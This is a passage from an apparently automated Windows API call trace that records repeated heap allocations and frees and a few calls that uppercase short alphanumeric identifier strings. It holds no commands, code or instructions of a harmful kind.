lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0105.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0105.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0105.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0105.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0105.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0105.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0105.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0105.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0105.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0105.701] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0105.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0105.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0105.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9bf8 [0105.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74118 [0105.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0105.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0105.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0105.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0105.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0105.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e20 [0105.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0105.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0105.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0105.702] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0105.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781d8 | out: hHeap=0x2af0000) returned 1 [0105.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0105.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e20 | out: hHeap=0x2af0000) returned 1 [0105.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0105.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0105.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0105.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0105.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed00 [0105.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed00 | out: hHeap=0x2af0000) returned 1 [0105.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0105.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0105.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0105.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0105.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0105.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d60 [0105.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0105.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0105.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0105.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0105.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0105.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0105.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74118 | out: hHeap=0x2af0000) returned 1 [0105.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0105.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0105.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7080 [0105.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0105.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0105.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0105.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0105.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0105.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0105.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0105.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0105.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7080 | out: hHeap=0x2af0000) returned 1 [0105.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0105.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0105.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5edc0 [0105.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5edc0 | out: hHeap=0x2af0000) returned 1 [0105.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0105.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0105.703] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0105.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0105.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0105.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9bf8 [0105.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74598 [0105.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0105.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0105.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0105.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0105.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0105.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cb8 [0105.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0105.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0105.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0105.704] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0105.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0105.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0105.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cb8 | out: hHeap=0x2af0000) returned 1 [0105.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0105.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0105.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0105.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0105.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0105.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0105.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0105.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0105.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0105.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0105.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c40 [0105.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0105.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c40 | out: hHeap=0x2af0000) returned 1 [0105.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0105.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0105.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0105.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0105.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0105.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0105.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0105.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ec8 [0105.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0105.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0105.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0105.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0105.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0105.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74598 | out: hHeap=0x2af0000) returned 1 [0105.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0105.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0105.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0105.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0105.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0105.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0105.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0105.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0105.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7120 [0105.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7120 | out: hHeap=0x2af0000) returned 1 [0105.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0105.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0105.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0105.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0105.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0105.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0105.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0105.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0105.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0105.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0105.707] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0105.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0105.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0105.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9c28 [0105.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0105.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0105.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0105.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0105.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ca0 [0105.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0105.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e20 [0105.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0105.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0105.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0105.707] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0105.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ff8 | out: hHeap=0x2af0000) returned 1 [0105.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0105.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e20 | out: hHeap=0x2af0000) returned 1 [0105.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ca0 | out: hHeap=0x2af0000) returned 1 [0105.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0105.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0105.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0105.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0105.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0105.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0105.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0105.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0105.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e38 [0105.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0105.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e50 [0105.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0105.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e50 | out: hHeap=0x2af0000) returned 1 [0105.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e38 | out: hHeap=0x2af0000) returned 1 [0105.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0105.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0105.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0105.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0105.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0105.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0105.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0105.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0105.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0105.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0105.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c70 [0105.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0105.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d18 [0105.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0105.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ca0 [0105.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0105.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e98 [0105.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0105.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0105.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0105.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0105.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0105.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0105.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f10 [0105.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0105.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d48 [0105.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0105.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e50 [0105.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0105.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e68 [0105.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cb8 [0105.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0105.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9dd8 [0105.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0105.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dd8 | out: hHeap=0x2af0000) returned 1 [0105.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cb8 | out: hHeap=0x2af0000) returned 1 [0105.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0105.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0105.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ce8 [0105.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0105.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d30 [0105.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0105.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0105.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78340 | out: hHeap=0x2af0000) returned 1 [0105.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e68 [0105.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0105.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0105.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e38 [0105.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0105.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d60 [0105.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0105.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cb8 [0105.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0105.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d00 | out: hHeap=0x2af0000) returned 1 [0105.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d78 | out: hHeap=0x2af0000) returned 1 [0105.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f28 | out: hHeap=0x2af0000) returned 1 [0105.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0105.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0105.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0105.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9df0 | out: hHeap=0x2af0000) returned 1 [0105.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c88 | out: hHeap=0x2af0000) returned 1 [0105.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e80 | out: hHeap=0x2af0000) returned 1 [0105.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0105.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0105.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0105.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7bfc8 | out: hHeap=0x2af0000) returned 1 [0105.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0105.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e80 | out: hHeap=0x2af0000) returned 1 [0105.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9df0 | out: hHeap=0x2af0000) returned 1 [0105.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0105.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0105.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0105.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0105.711] HeapFree (in: hHeap=0x2af0000, 